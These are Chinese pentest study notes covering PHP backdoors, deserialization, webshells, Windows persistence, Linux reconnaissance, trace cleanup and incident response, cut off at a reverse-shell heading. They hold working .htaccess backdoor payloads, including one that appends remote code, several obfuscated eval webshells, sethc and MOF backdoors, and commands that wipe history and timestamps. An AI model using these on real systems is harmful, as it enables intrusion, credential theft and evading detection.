471 | Apache Commons IO Serialization包中的 ValidatingObjectInputStream 类提供了 accept 方法，可以通过该方法来实现反序列化类白/黑名单控制，一个demo如下
472 | 
473 | ![image](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCE1396664adda60a6eab70eba12353ce80/9459)
474 | 
475 | 4.3.5.8.3. ObjectInputFilter
476 | 
477 | Java 9提供了支持序列化数据过滤的新特性，可以继承 java.io.ObjectInputFilter 类重写 checkInput方法来实现自定义的过滤器，并使用 ObjectInputStream 对象的 setObjectInputFilter 设置过滤器来实现反序列化类白/黑名单控制。


--------------------------------------------------------------------------------
/WEB安全渗透测试基础知识（十二）.md:
--------------------------------------------------------------------------------
  1 | # WEB安全渗透测试基础知识（十二）
  2 | 
  3 | **PHP**
  4 | 
  5 | 4.1.1. 后门
  6 | 
  7 | 4.1.1.1. php.ini构成的后门
  8 | 
  9 | 利用 auto_prepend_file 和 include_path
 10 | 
 11 | 
 12 | ---
 13 | 4.1.1.2. .htaccess后门
 14 | 
 15 | php_value auto_append_file .htaccess 
 16 | #<?php phpinfo(); 
 17 | 
 18 | php_flag allow_url_include 1 
 19 | php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw== 
 20 | #php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B 
 21 | #php_value auto_append_file https://sektioneins.de/evil-code.txt
 22 | 
 23 | ---
 24 | 4.1.1.3. .user.ini文件构成的PHP后门
 25 | 
 26 | .user.ini可运行于所有以fastcgi运行的server。利用方式同php.in
 27 | 
 28 | ---
 29 | 4.1.2. 反序列化
 30 | 
 31 | 4.1.2.1. PHP序列化实现
 32 | 
 33 | PHP序列化处理共有三种，分别为php_serialize、php_binary和 WDDX，默认为php_serialize，可通过配置中的 session.serialize_handler 修改。  
 34 | 
 35 | 其中php_serialize的实现在 php-src/ext/standard/var.c 中，主要函数为 php_var_serialize_intern ，序列化后的格式如下：  
 36 | 
 37 | - boolean
 38 | 
 39 | b:<value>;
 40 | 
 41 | b:1; // true
 42 | 
 43 | b:0; // false
 44 | 
 45 | - integer
 46 | 
 47 | i:<value>;
 48 | 
 49 | - double
 50 | 
 51 | d:<value>;
 52 | 
 53 | - NULL
 54 | 
 55 | N;
 56 | 
 57 | - string
 58 | 
 59 | s:<length>:"<value>";
 60 | 
 61 | s:1:"s";
 62 | 
 63 | - array
 64 | 
 65 | a:<length>:{key, value};
 66 | 
 67 | a:1:{s:4:"key1";s:6:"value1";} // array("key1" => "value1");
 68 | 
 69 | - object
 70 | O:<class_name_length>:"<class_name><number_of_properties>:{<properties>};
 71 | 
 72 | - reference
 73 | 
 74 | 指针类型
 75 | 
 76 | R:reference;
 77 | 
 78 | O:1:"A":2:{s:1:"a";i:1;s:1:"b";R:2;}
 79 | 
 80 | $a = new A();$a->a=1;$a->b=&$a->a;
 81 | 
 82 | ---
 83 | 4.1.2.2. PHP反序列化漏洞
 84 | php在反序列化的时候会调用 __wakeup / __sleep 等函数，可能会造成代码执行等问题。若没有相关函数，在析构时也会调用相关的析构函数，同样会造成代码执行。  
 85 | 
 86 | 另外 __toString / __call 两个函数也有利用的可能。  
 87 | 
 88 | 其中 __wakeup 在反序列化时被触发，__destruct 在GC时被触发， __toString 在echo时被触发, __call 在一个未被定义的函数调用时被触发。  
 89 | 
 90 | 下面提供一个简单的demo.
 91 | 利用 auto_prepend_file 和 include_path
 92 | 
 93 | ![image](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCE67a5da5d0a045bf22b09713c66bf3724/9222)
 94 | 
 95 | 输出
 96 | 
 97 | construct 
 98 | Data's value is raw value. 
 99 | destruct 
100 | string(44) "O:4:"Demo":1:{s:4:"data";s:9:"raw value";}"
101 | 
102 | 把序列化的字符串修改一下后，执行
103 | 
104 | unserialize('O:4:"Demo":1:{s:4:"data";s:15:"malicious value";}');
105 | 
106 | 输出
107 | 
108 | wake up 
109 | Data's value is malicious value. 
110 | destruct
111 | 
112 | 这里看到，值被修改了.  
113 | 上面是一个 unserialize() 的简单应用，不难看出，如果 __wakeup() 或者 __desturct() 有敏感操作，比如读写文件、操作数据库，就可以通过函数实现文件读写或者数据读取的行为。
114 | 
115 | 那么，在 __wakeup()
116 | 
117 | 中加入判断是否可以阻止这个漏洞呢？在 __wakeup() 中我们加入一行代码
118 | 
119 | ![image](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCEf41b00df95cc37c77ba701946a97f264/9228)
120 | 
121 | 但其实还是可以绕过的，在 PHP5 < 5.6.25， PHP7 < 7.0.10 的版本都存在wakeup的漏洞。当反序列化中object的个数和之前的个数不等时，wakeup就会被绕过，于是使用下面的payload
122 | 
123 | unserialize('O:7:"HITCON":1:{s:4:"data";s:15:"malicious value";}');
124 | 
125 | 输出
126 | 
127 | Data's value is malicious value. 
128 | 
129 | destruct 
130 | 
131 | 这里wakeup被绕过，值依旧被修改了。
132 | 
133 | ---
134 | 4.1.3. Disable Functions
135 | 
136 | 4.1.3.1. 机制实现
137 | 
138 | PHP中Disable Function的实现是在php-src/Zend/Zend-API.c中。PHP在启动时，读取配置文件中禁止的函数，逐一根据禁止的函数名调用 zend_disable_function 来实现禁止的效果。  
139 | 
140 | 这个函数根据函数名在内置函数列表中找到对应的位置并修改掉，当前版本的代码如下：
141 | 
142 | ![image](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCE50a59eff31f874a1eee86fcae9d2951e/9238)
143 | 
144 | 和函数的实现方式类似，disable classes也是这样实现的
145 | ![image](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCEfb7613b26c045cc11e63c28503c419c8/9237)
146 | 
147 | 因为这个实现机制的原因，在PHP启动后通过 ini_set 来修改 disable_functions 或 disable_classes 是无效的。
148 | 
149 | 
150 | ---
151 | 4.1.3.2. Bypass
152 | - LD_PRELOAD绕过 
153 | https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD 
154 | - PHP OPcache 
155 | - Mail函数 
156 | - imap_open 
157 | https://www.cvedetails.com/cve/cve-2018-19518
158 | 
159 | 
160 | ---
161 | 4.1.4. Open Basedir
162 | 
163 | 4.1.4.1. 机制实现
164 | 
165 | PHP中Disable Function的实现是在php-src/main/fopen-wrappers.c中，实现方式是在调用文件等相关操作时调用函数根据路径来检查是否在basedir内，其中一部分实现代码如下：
166 | 
167 | 
168 | ```
169 | PHPAPI int php_check_open_basedir_ex(const char *path, int warn) 
170 | {     
171 |     /* Only check when open_basedir is available */     
172 |    if (PG(open_basedir) && *PG(open_basedir)) {         
173 |        char *pathbuf;         
174 |        char *ptr;         
175 |        char *end;
176 |        /* Check if the path is too long so we can give a more useful error    
177 |       * message. */         
178 |      if (strlen(path) > (MAXPATHLEN - 1)) {             
179 |           php_error_docref(NULL, E_WARNING, "File name is longer than the maximum allowed path length on this platform (%d): %s", MAXPATHLEN, path);
180 |           errno = EINVAL;            
181 |           return -1;         
182 |        }
183 |       pathbuf = estrdup(PG(open_basedir))
184 |       ptr = pathbuf;
185 |       while (ptr && *ptr) {             
186 |               end = strchr(ptr, DEFAULT_DIR_SEPARATOR);             
187 |               if (end != NULL) {                 
188 |                   *end = '\0';                 
189 |                     end++;             
190 |                }
191 |               if (php_check_specific_open_basedir(ptr, path) == 0) {                
192 |                   efree(pathbuf);                 
193 |                   return 0;             
194 |                }
195 |           ptr = end;         
196 |      }         
197 |      if (warn) {             
198 |     php_error_docref(NULL, E_WARNING, "open_basedir restriction in effect. File(%s) is not within the allowed path(s): (%s)", path, PG(open_basedir));
199 |      }
200 |      efree(pathbuf);         
201 |      errno = EPERM; /* we deny permission to open it */         
202 |      return -1;     
203 |  }
204 |  /* Nothing to check... */     
205 |  return 0;
206 | }
207 | ```
208 | 
209 | 
210 | 
211 | ---
212 | 4.1.5. phpinfo相关漏洞
213 | 
214 | 4.1.5.1. Session.Save
215 | 
216 | PHP的Session默认handler为文件，存储在 php.ini 的 session.save_path 中，若有任意读写文件的权限，则可修改或读取session。从phpinfo中可获得session位置
217 | 
218 | ---
219 | 4.1.5.2. Session.Upload
220 | 
221 | php.ini默认开启了 session.upload_progress.enabled ， 该选项会导致生成上传进度文件，其存储路径可以在phpinfo中获取。  
222 | 那么可以构造特别的报文向服务器发送，在有LFI的情况下即可利用。
223 | 
224 | 
225 | ---
226 | 4.1.5.3. /tmp临时文件竞争
227 | 
228 | phpinfo中可以看到上传的临时文件的路径，从而实现LFI
229 | 
230 | ---
231 | 4.1.6. htaccess injection payload
232 | 
233 | 4.1.6.1. file inclusion
234 | 
235 | 利用 auto_prepend_file 和 include_path
236 | 
237 | ---
238 | 4.1.6.2. code execution
239 | 
240 | php_value auto_append_file .htaccess 
241 | #<?php phpinfo();
242 | 
243 | ---
244 | 4.1.6.3. file inclusion
245 | - php_flag allow_url_include 1 
246 | - php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw== 
247 | - #php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B 
248 | - #php_value auto_append_file https://sektioneins.de/evil-code.txt
249 | 
250 | 
251 | ---
252 | 4.1.6.4. code execution with UTF-7
253 | 
254 | - php_flag zend.multibyte 1 
255 | - php_value zend.script_encoding "UTF-7" 
256 | - php_value auto_append_file .htaccess 
257 | - #+ADw?php phpinfo()+ADs
258 | 
259 | 
260 | ---
261 | 4.1.6.5. Source code disclosure
262 | 
263 | php_flag engine 0
264 | 
265 | ---
266 | 4.1.7. WebShell
267 | 
268 | 4.1.7.1. 常见变形
269 | 
270 | - GLOBALS
271 | 
272 | eval($GLOBALS['_POST']['op']); 
273 | - $_FILE 
274 | 
275 | eval($_FILE['name']); 
276 | - 拆分 
277 | 
278 | assert(${"_PO"."ST"} ['sz']); 
279 | - 动态函数执行 
280 | 
281 | $k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);
282 | 
283 | - create_function 
284 | 
285 | $function = create_function('$code',strrev('lave').'('.strrev('TEG_$').'["code"]);');$function(); 
286 | 
287 | - preg_replace 
288 | - rot13 
289 | - base64 
290 | - 进制转化 
291 | "\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145" 
292 | - 利用文件名
293 | 
294 | __FILE__
295 | 
296 | 
297 | ---
298 | 4.1.7.2. 字符串变形函数
299 | 
300 | - ucwords
301 | - ucfirst
302 | - trim
303 | - substr_replace
304 | - substr
305 | - strtr
306 | - strtoupper
307 | - strtolower
308 | - strtok
309 | - str_rot13
310 | 
311 | 
312 | ---
313 | 4.1.7.3. 回调函数
314 | - call_user_func_array
315 | - call_user_func
316 | - array_filter
317 | - array_walk
318 | - array_map
319 | - registregister_shutdown_function
320 | - register_tick_function
321 | - filter_var
322 | - filter_var_array
323 | - uasort
324 | - uksort
325 | - array_reduce
326 | - array_walk
327 | - array_walk_recursive
328 | 
329 | 
330 | ---
331 | PHP的字符串可以在进行异或、自增运算的时候，会直接进行运算，故可以使用特殊字符来构成Shell。
332 | 
333 | ```
334 | @$_++; 
335 | $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); 
336 | @${$__}[!$_](${$__}[$_]);
337 | $_=[]; 
338 | $_=@"$_"; // $_='Array'; 
339 | $_=$_['!'=='@']; // $_=$_[0]; 
340 | $___=$_; // A
341 | $__=$_; 
342 | $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; 
343 | $___.=$__; // S 
344 | $___.=$__; // S
345 | $__=$_; 
346 | $__++;$__++;$__++;$__++; // E
347 | $___.=$__;
348 | $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
349 | $___.=$__; 
350 | $__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
351 | $___.=$__; 
352 | $____='_'; 
353 | $__=$_;
354 | $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
355 | $____.=$__;
356 | $__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
357 | $____.=$__; 
358 | $__=$_;
359 | $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
360 | $____.=$__;
361 | $__=$_;
362 | $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
363 | $____.=$__;
364 | 
365 | $_=$$____; 
366 | $___(base64_decode($_[_]));
367 | ```
368 | 
369 | ---
370 | 4.1.8. 其它
371 | 
372 | 4.1.8.1. 低精度
373 | 
374 | php中并不是用高精度来存储浮点数，而是用使用 IEEE 754 双精度格式，造成在涉及到浮点数比较的时候可能会出现预期之外的错误。比如 php -r "var_dump(0.2+0.7==0.9);" 这行代码的输出是 bool(false) 而不是 bool(true)。这在一些情况下可能出现问题。
375 | 
376 | ---
377 | 4.1.8.2. 弱类型
378 | 
379 | 如果使用 == 来判断相等，则会因为类型推断出现一些预料之外的行为，比如magic hash，指当两个md5值都是 0e[0-9]{30} 的时候，就会认为两个hash值相等。另外在判断字符串和数字的时候，PHP会自动做类型转换，那么 1=="1a.php" 的结果会是true  
380 | 
381 | 另外在判断一些hash时，如果传入的是数组，返回值会为 NULL, 因此在判断来自网络请求的数据的哈希值时需要先判断数据类型。
382 | 
383 | 同样的， strcmp() ereg() strpos() 这些函数在处理数组的时候也会异常，返回NULL。
384 | 
385 | ---
386 | 4.1.8.3. 命令执行
387 | 
388 | preg_replace 第一个参数是//e的时候，第二个参数会被当作命令执行
389 | 
390 | ---
391 | 4.1.8.4. 截断
392 | 
393 | PHP字符存在截断行为，可以使用 ereg / %00 / iconv 等实现php字符截断的操作，从而触发
394 | 
395 | ---
396 | 4.1.8.5. 变量覆盖
397 | 
398 | 当使用 extract / parse_str 等函数时，或者使用php的 $$ 特性时，如果没有正确的调用，则可能使得用户可以任意修改变量。
399 | 
400 | ---
401 | 4.1.8.6. 执行系统命令
402 | 
403 | 禁用的函数可以在phpinfo中的 disable_functions 中查看
404 | - pcntl_exec
405 | - exec
406 | - passthru
407 | - popen
408 | - shell_exec
409 | - system
410 | - proc_open
411 | 
412 | 
413 | ---
414 | 4.1.8.7. Magic函数
415 | - __construct() __destruct()
416 | - __call() __callStatic()
417 | - __get() __set()
418 | - __isset() __unset()
419 | - __sleep() __wakeup()
420 | - __toString()
421 | - __invoke()
422 | - __set_state()
423 | - __clone()
424 | - __debugInfo()
425 | 
426 | 
427 | ---
428 | 4.1.8.8. 文件相关敏感函数
429 | - move_uploaded_file
430 | - file_put_contents / file_get_contents
431 | - unlink
432 | - fopen / fgets
433 | 
434 | ---
435 | 4.1.8.9. php特性
436 | 
437 | - php自身在解析请求的时候，如果参数名字中包含” “、”.”、”[“这几个字符，会将他们转换成下划线。


--------------------------------------------------------------------------------
/WEB安全渗透测试基础知识（十五）.md:
--------------------------------------------------------------------------------
  1 | # WEB安全渗透测试基础知识（十五）
  2 | 
  3 | 
  4 | **Windows系统持久化**
  5 | 
  6 | 5.2. 持久化 – Windows
  7 | 
  8 | 5.2.1. 隐藏文件
  9 | 
 10 | - 创建系统隐藏文件
 11 | attrib +s +a +r +h filename / attrib +s +h filename
 12 | - 利用NTFS ADS (Alternate　Data　Streams) 创建隐藏文件
 13 | - 利用Windows保留字
 14 | aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9
 15 | 
 16 | 
 17 | ---
 18 | 5.2.2. UAC
 19 | 
 20 | 5.2.2.1. 简介
 21 | 
 22 | UAC (User Account Control) 是Windows的一个安全机制，当一些敏感操作发生时，会跳出提示显式要求系统权限。  
 23 | 
 24 | 当用户登陆Windows时，每个用户都会被授予一个access token，这个token中有security identifier (SID) 的信息，决定了用户的权限。
 25 | 
 26 | 5.2.2.2. 会触发UAC的操作
 27 | 
 28 | ```
 29 | 以管理员权限启动应用
 30 | 修改系统、UAC设置
 31 | 修改没有权限的文件或者目录（ %SystemRoot% / %ProgramFiles% 等 ）
 32 | 修改ACL (access control list) 安装驱动
 33 | 增删账户，修改账户类型，激活来宾账户
 34 | ```
 35 | 
 36 | ---
 37 | 5.2.3. 权限提升
 38 | 
 39 | 权限提升有多重方式，有利用二进制漏洞、逻辑漏洞等技巧。利用二进制漏洞获取权限的方式是利用运行在内核态中的漏洞来执行代码。比如内核、驱动中的UAF或者其他类似的漏洞，以获得较高的权限。
 40 | 
 41 | 逻辑漏洞主要是利用系统的一些逻辑存在问题的机制，比如有些文件夹用户可以写入，但是会以管理员权限启动。
 42 | 
 43 | 5.2.3.1. 任意写文件利用
 44 | 
 45 | 在Windows中用户可以写的敏感位置主要有以下这些
 46 | - 用户自身的文件和目录，包括 AppData Temp
 47 | - C:\ ，默认情况下用户可以写入
 48 | - C:\ProgramData 的子目录，默认情况下用户可以创建文件夹、写入文件
 49 | - C:\Windows\Temp 的子目录，默认情况下用户可以创建文件夹、写入文件
 50 | 
 51 | 具体的ACL信息可用AccessChk, 或者PowerShell的 Get-Acl 命令查看。  
 52 | 可以利用对这些文件夹及其子目录的写权限，写入一些可能会被加载的dll，利用dll的加载执行来获取权限。
 53 | 
 54 | 5.2.3.2. MOF
 55 | MOF是Windows系统的一个文件（ c:/windows/system32/wbem/mof/nullevt.mof ）叫做”托管对象格式”，其作用是每隔五秒就会去监控进程创建和死亡。  
 56 | 
 57 | 当拥有文件上传的权限但是没有Shell时，可以上传定制的mof文件至相应的位置，一定时间后这个mof就会被执行。 
 58 |  一般会采用在mof中加入一段添加管理员用户的命令的vbs脚本，当执行后就拥有了新的管理员账户。
 59 |  
 60 | 5.2.3.3. sethc
 61 | 
 62 | sethc.exe 是 Windows系统在用户按下五次shift后调用的粘滞键处理程序，当有写文件但是没有执行权限时，可以通过替换 sethc.exe 的方式留下后门，在密码输入页面输入五次shift即可获得权限。
 63 | 
 64 | 5.2.3.4. 凭证窃取
 65 | 
 66 | ```
 67 | Windows本地密码散列导出工具
 68 | mimikatz
 69 | wce
 70 | gsecdump
 71 | copypwd
 72 | Pwdump
 73 | Windows本地密码破解工具
 74 | L0phtCrack
 75 | SAMInside
 76 | Ophcrack
 77 | 彩虹表破解
 78 | 本机hash+明文抓取
 79 | win8+win2012明文抓取
 80 | ntds.dit的导出+QuarkPwDump读取分析
 81 | vssown.vbs + libesedb + NtdsXtract
 82 | ntdsdump
 83 | 利用powershell(DSInternals)分析hash
 84 | 使用 net use \\%computername% /u:%username% 重置密码尝试次数
 85 | ```
 86 | 
 87 | 5.2.3.5. 其他
 88 | 
 89 | - 组策略首选项漏洞
 90 | - DLL劫持
 91 | - 替换系统工具，实现后门
 92 | 
 93 | 
 94 | ---
 95 | **Linux信息收集**
 96 | 
 97 | 5.3. 信息收集 – Linux
 98 | 
 99 | 5.3.1. 获取内核，操作系统和设备信息
100 | 
101 | - 版本信息
102 | uname -a 所有版本
103 | uname -r 内核版本信息
104 | uname -n 系统主机名字
105 | uname -m Linux
106 | - 内核架构 内核信息 cat /proc/version
107 | - CPU信息 cat /proc/cpuinfo
108 | - 发布信息
109 | 
110 | cat /etc/*-release
111 | 
112 | cat /etc/issue
113 | 
114 | 主机名 hostname
115 | 
116 | 文件系统 df -a
117 | 
118 | 
119 | ---
120 | 5.3.2. 用户和组
121 | 
122 | ```
123 | 列出系统所有用户 cat /etc/passwd
124 | 列出系统所有组 cat /etc/group
125 | 列出所有用户hash（root）“cat /etc/shadow“
126 | 用户
127 | 查询用户的基本信息 finger
128 | 当前登录的用户 users who -a
129 | 目前登录的用户 w
130 | 登入过的用户信息 last
131 | 显示系统中所有用户最近一次登录信息 lastlog
132 | ```
133 | 5.3.3. 用户和权限信息
134 | - 当前用户 whoami
135 | - 当前用户信息 id
136 | - 可以使用sudo提升到root的用户（root） cat /etc/sudoers
137 | - 列出目前用户可执行与无法执行的指令 sudo -l
138 | 
139 | ---
140 | 
141 | 5.3.4. 环境信息
142 | 
143 | ```
144 | 打印系统环境信息 env
145 | 打印系统环境信息 set
146 | 环境变量中的路径信息 echo  $PATH
147 | 打印历史命令 history
148 | 显示当前路径 pwd
149 | 显示默认系统遍历 cat /etc/profile
150 | 显示可用的shell cat /etc/shells
151 | ```
152 | 
153 | ---
154 | 5.3.5. 服务信息
155 | - 查看进程信息 ps aux
156 | - 由inetd管理的服务列表 cat /etc/inetd.conf
157 | - 由xinetd管理的服务列表 cat /etc/xinetd.conf
158 | - nfs服务器的配置 cat /etc/exports
159 | 
160 | ---
161 | 5.3.6. 作业和任务
162 | - 显示指定用户的计划作业（root） crontab -l -u %user%
163 | - 计划任务 ls -la /etc/cron*
164 | 
165 | ---
166 | 5.3.7. 网络、路由和通信
167 | 
168 | ```
169 | 列出网络接口信息 /sbin/ifconfig -a
170 | 列出网络接口信息 cat /etc/network/interfaces
171 | 查看系统arp表 arp -a
172 | 打印路由信息 route
173 | 查看dns配置信息 cat /etc/resolv.conf
174 | 打印本地端口开放信息 netstat -an
175 | 列出iptable的配置规则 iptables -L
176 | 查看端口服务映射 cat /etc/services
177 | ```
178 | 
179 | ---
180 | **入侵痕迹清理**
181 | 
182 | 5.4. 入侵痕迹清理
183 | 
184 | 5.4.1. Windows
185 | - 操作日志：3389登录列表、文件访问日志、浏览器日志、系统事件
186 | - 登录日志：系统安全日志
187 | 
188 | ---
189 | 5.4.2. Linux
190 | 
191 | - 清除历史
192 | unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null;
193 | - 删除 ~/.ssh/known_hosts 中记录
194 | - 修改文件时间戳
195 | touch –r
196 | - 删除tmp目录临时文件
197 | 
198 | 
199 | ---
200 | 5.4.3. 难点
201 | - 攻击和入侵很难完全删除痕迹，没有日志记录也是一种特征
202 | - 即使删除本地日志，在网络设备、安全设备、集中化日志系统中仍有记录
203 | - 留存的后门包含攻击者的信息
204 | - 使用的代理或跳板可能会被反向入侵
205 | 
206 | ---
207 | 5.4.4. 注意
208 | - 在操作前检查是否有用户在线
209 | - 删除文件使用磁盘覆写的功能删除
210 | - 尽量和攻击前状态保持一致
211 | 


--------------------------------------------------------------------------------
/WEB安全渗透测试基础知识（十八）.md:
--------------------------------------------------------------------------------
  1 | # WEB安全渗透测试基础知识（十八）
  2 | 
  3 | 
  4 | **入侵检测**
  5 | 
  6 | 6.7.1. 常见入侵点
  7 | - Web入侵
  8 | - 高危服务入侵
  9 | 
 10 | 
 11 | ---
 12 | 6.7.2. 常见实现
 13 | 
 14 | 6.7.2.1. 客户端监控
 15 | 
 16 | - 监控敏感配置文件
 17 | - 常用命令ELF文件完整性监控
 18 | ps
 19 | lsof
 20 | …
 21 | - rootkit监控
 22 | - 资源使用报警
 23 | 内存使用率
 24 | CPU使用率
 25 | IO使用率
 26 | 网络使用率
 27 | - 新出现进程监控
 28 | - 基于inotify的文件监控
 29 | 
 30 | 6.7.2.2. 网络检测
 31 | 
 32 | 基于网络层面的攻击向量做检测，如Snort等。
 33 | 6.7.2.3. 日志分析
 34 | 
 35 | 将主机系统安全日志/操作日志、网络设备流量日志、Web应用访问日志、SQL应用访问日志等日志集中到一个统一的后台，在后台中对各类日志进行综合的分析。
 36 | 
 37 | 
 38 | ---
 39 | **应急响应**
 40 | 
 41 | 6.8.1. 响应流程
 42 | 
 43 | 6.8.1.1. 事件发生
 44 | 
 45 | 运维监控人员、客服审核人员等发现问题，向上通报
 46 | 6.8.1.2. 事件确认
 47 | 
 48 | 判断事件的严重性，评估出问题的严重等级，是否向上进行汇报等
 49 | 6.8.1.3. 事件响应
 50 | 
 51 | 各部门通力合作，处理安全问题，具体解决阶段
 52 | 6.8.1.4. 事件关闭
 53 | 
 54 | 处理完事件之后，需要关闭事件，并写出安全应急处理分析报告，完成整个应急过程。
 55 | 
 56 | 
 57 | ---
 58 | 6.8.2. 事件分类
 59 | 
 60 | - 病毒、木马、蠕虫事件
 61 | - Web服务器入侵事件
 62 | - 第三方服务入侵事件
 63 | - 系统入侵事件
 64 | 利用Windows漏洞攻击操作系统
 65 | - 网络攻击事件
 66 | DDoS / ARP欺骗 / DNS劫持等
 67 | 
 68 | ---
 69 | 6.8.3. 分析方向
 70 | 
 71 | 6.8.3.1. 文件分析
 72 | - 基于变化的分析
 73 | 日期
 74 | 文件增改
 75 | 最近使用文件
 76 | - 源码分析
 77 | 检查源码改动
 78 | 查杀WebShell等后门
 79 | - 系统日志分析
 80 | - 应用日志分析
 81 | 分析User-Agent，e.g. awvs / burpsuite / w3af / nessus / openvas
 82 | 对每种攻击进行关键字匹配，e.g. select/alert/eval
 83 | 异常请求，连续的404或者500
 84 | - md5sum 检查常用命令二进制文件的哈希，检查是否被植入rootkit
 85 | 
 86 | 6.8.3.2. 进程分析
 87 | - 符合以下特征的进程
 88 | CPU或内存资源占用长时间过高
 89 | 没有签名验证信息
 90 | 没有描述信息的进程
 91 | 进程的路径不合法
 92 | - dump系统内存进行分析
 93 | 
 94 | 6.8.3.3. 网络分析
 95 | - 防火墙配置
 96 | - DNS配置
 97 | - 路由配置
 98 | 
 99 | 6.8.3.4. 配置分析
100 | - 查看Linux SE等配置
101 | - 查看环境变量
102 | - 查看配套的注册表信息检索，SAM文件
103 | - 内核模块
104 | 
105 | 
106 | ---
107 | 6.8.4. Linux应急响应
108 | 
109 | 6.8.4.1. 文件分析
110 | - 最近使用文件
111 | find / -ctime -2
112 | C:\Documents and Settings\Administrator\Recent
113 | C:\Documents and Settings\Default User\Recent
114 | %UserProfile%\Recent
115 | - 系统日志分析
116 | /var/log/
117 | - 重点分析位置
118 | 
119 | ```
120 | /var/log/wtmp登录进入，退出，数据交换、关机和重启纪录
121 | /var/run/utmp 有关当前登录用户的信息记录
122 | /var/log/lastlog 文件记录用户最后登录的信息，可用 lastlog 命令来查看。
123 | /var/log/secure 记录登入系统存取数据的文件，例如 pop3/ssh/telnet/ftp 等都会被记录。
124 | /var/log/cron 与定时任务相关的日志信息
125 | /var/log/message 系统启动后的信息和错误日志
126 | /var/log/apache2/access.log
127 | apache access log
128 | /etc/passwd 用户列表
129 | /etc/init.d/ 开机启动项
130 | /etc/cron* 定时任务
131 | /tmp 临时目录
132 | ~/.ssh
133 | ```
134 | 
135 | 6.8.4.2. 用户分析
136 | - /etc/shadow 密码登陆相关信息
137 | - uptime 查看用户登陆时间
138 | - /etc/sudoers sudo用户列表
139 | 
140 | 6.8.4.3. 进程分析
141 | - netstat -ano 查看是否打开了可疑端口
142 | - w 命令，查看用户及其进程
143 | - 分析开机自启程序/脚本
144 | /etc/init.d
145 | ~/.bashrc
146 | - 查看计划或定时任务
147 | crontab -l
148 | - netstat -an / lsof 查看进程端口占用
149 | 
150 | ---
151 | 6.8.5. Windows应急响应
152 | 
153 | 6.8.5.1. 文件分析
154 | - 最近使用文件
155 | 
156 | C:\Documents and Settings\Administrator\Recent
157 | 
158 | C:\Documents and Settings\Default User\Recent
159 | %UserProfile%\Recent
160 | - 系统日志分析
161 | 
162 | 事件查看器 eventvwr.msc
163 | 
164 | 6.8.5.2. 用户分析
165 | - 查看是否有新增用户
166 | - 查看服务器是否有弱口令
167 | - 查看管理员对应键值
168 | - lusrmgr.msc 查看账户变化
169 | - net user 列出当前登录账户
170 | - wmic UserAccount get 列出当前系统所有账户
171 | 
172 | 6.8.5.3. 进程分析
173 | - netstat -ano 查看是否打开了可疑端口
174 | - tasklist 查看是否有可疑进程
175 | - 分析开机自启程序
176 | 
177 | ```
178 | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
179 | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runonce HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
180 | (ProfilePath)\Start Menu\Programs\Startup 启动项
181 | msconfig 启动选项卡
182 | gpedit.msc 组策略编辑器
183 | ```
184 | 
185 | - 查看计划或定时任务
186 | 
187 | C:\Windows\System32\Tasks\
188 | 
189 | C:\Windows\SysWOW64\Tasks\
190 | 
191 | C:\Windows\tasks\
192 | 
193 | schtasks
194 | 
195 | taskschd.msc
196 | 


--------------------------------------------------------------------------------
/WEB安全渗透测试基础知识（十六）.md:
--------------------------------------------------------------------------------
  1 | # WEB安全渗透测试基础知识（十六）
  2 | 
  3 | 
  4 | **内网渗透补充操作**
  5 | 
  6 | 5.5. 内网渗透补充操作
  7 | 
  8 | 5.5.1. 端口转发
  9 | - windows
 10 | 
 11 | lcx
 12 | 
 13 | netsh
 14 | - linux
 15 | 
 16 | portmap
 17 | 
 18 | iptables
 19 | - socket代理
 20 | 
 21 | Win: xsocks
 22 | 
 23 | Linux: proxychains
 24 | - 基于http的转发与socket代理(低权限下的渗透)
 25 | 
 26 | 端口转发: tunna
 27 | 
 28 | socks代理: reGeorg
 29 | - ssh通道
 30 | 
 31 | 端口转发
 32 | 
 33 | socks
 34 | 
 35 | 5.5.2. 获取shell
 36 | 
 37 | - 常规shell反弹
 38 | 
